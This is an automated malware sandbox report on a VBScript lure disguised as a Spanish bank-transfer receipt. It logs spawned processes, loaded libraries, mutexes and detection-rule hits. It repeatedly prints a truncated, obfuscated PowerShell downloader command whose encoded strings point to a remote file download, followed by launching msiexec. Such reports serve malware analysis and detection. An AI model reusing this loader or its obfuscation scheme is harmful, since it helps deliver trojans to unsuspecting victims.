              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F1EFD83_2_04F1EFD8
              Source: Recibo de transferencia#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7527
              Source: unknownProcess created: Commandline size = 7527
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7527Jump to behavior
              Source: amsi32_7836.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Margenindstilling.SysJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdicctlj.ruj.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7592
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7836
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Su
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Su
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2SuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
